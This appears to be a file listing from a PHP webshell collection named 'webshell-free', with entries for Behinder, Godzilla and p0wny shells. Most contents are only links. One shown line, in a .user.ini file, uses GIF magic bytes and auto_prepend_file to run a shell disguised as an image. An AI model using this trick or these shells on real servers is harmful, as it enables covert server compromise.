-------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php/README.md -------------------------------------------------------------------------------- /php/i.txt: -------------------------------------------------------------------------------- 1 | phpinfo(); -------------------------------------------------------------------------------- /php/i.txt.bypass.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php/i.txt.bypass.php -------------------------------------------------------------------------------- /php/php-venom-3.3.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php/php-venom-3.3.py -------------------------------------------------------------------------------- /php_new/.htaccess: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/.htaccess -------------------------------------------------------------------------------- /php_new/.user.ini: -------------------------------------------------------------------------------- 1 | GIF89a auto_prepend_file=p0wny.png -------------------------------------------------------------------------------- /php_new/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/1.png -------------------------------------------------------------------------------- /php_new/Exception.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/Exception.php -------------------------------------------------------------------------------- /php_new/behinder.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/behinder.php -------------------------------------------------------------------------------- /php_new/calc.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/calc.php -------------------------------------------------------------------------------- /php_new/comment-php5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/comment-php5.php -------------------------------------------------------------------------------- /php_new/godzilla.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/godzilla.php -------------------------------------------------------------------------------- /php_new/googlebot.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/googlebot.gif -------------------------------------------------------------------------------- /php_new/googlebot.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/googlebot.jpg -------------------------------------------------------------------------------- /php_new/googlebot.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php_new/gz.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/php_new/gz.php -------------------------------------------------------------------------------- /php_new/header-via.php: -------------------------------------------------------------------------------- 1 |